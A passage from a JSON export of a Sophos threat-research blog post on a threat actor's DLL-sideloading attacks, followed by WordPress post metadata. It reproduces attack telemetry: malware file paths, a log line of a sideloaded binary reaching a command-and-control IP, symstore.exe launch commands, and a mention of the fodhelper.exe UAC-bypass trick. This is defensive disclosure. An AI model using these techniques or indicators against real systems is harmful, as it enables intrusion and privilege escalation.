\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutloader.ja ]<\/pre>\n<p>Connecting to the server:<\/p>\n<pre>2022-06-24T04:18:11.335261Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesciscocollabhost.exe::38752 ]\u00a0\u00a0\u00a0 === IpConnector ===&gt;  \u00a0 \u00a0 \u00a0[ 91.245.253[.]52 ]<\/pre>\n<p>The threat actor executed symstore.exe, with a few different command line arguments:<\/p>\n<pre>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\"commandLine\" :   \"C:\\Users\\Public\\Libraries\\out\\symstore.exe\u00a0   C:\\Users\\Public\\Libraries\\out\\googleupdate.exe\",  \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \"commandLine\" :   \"C:\\Users\\Public\\Libraries\\out\\symstore.exe\u00a0   C:\\users\\public\\libraries\\3.exe\",  \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \"commandLine\" :   \"C:\\Users\\Public\\Libraries\\out\\symstore.exe\u00a0 \"mkdir   C:\\programdata\\googleupdate\"\",<\/pre>\n<p>It is likely that the sideloaded DLL component (symsrv.dll) takes these command-line parameters and executes using the fodhelper.exe UAC bypass trick.<\/p>\n<p>IOCs for these attacks will be available on our <a href=\"https:\/\/github.com\/sophoslabs\/IoCs\">GitHub repository<\/a>.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2022\/11\/03\/family-tree-related-dll-sideloading-cases-bear-strange-fruit\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/shutterstock_188747756.jpg\"\/><\/p>\n<p><strong>Credit to Author: Gabor Szappanos| Date: Thu, 03 Nov 2022 12:03:13 +0000<\/strong><\/p>\n<p>A threat actor\u2019s repeated use of DLL-hijack execution flow makes for interesting attack results, including omnivorous file ingestion; we break down five cases and find commonalities<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[27897,129,27030,16771,27033],"class_list":["post-20534","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-dll-side-load","tag-featured","tag-sophos-x-ops","tag-threat-research","tag-x-ops"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/20534","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=20534"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/20534\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=20534"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=20534"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=20534"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}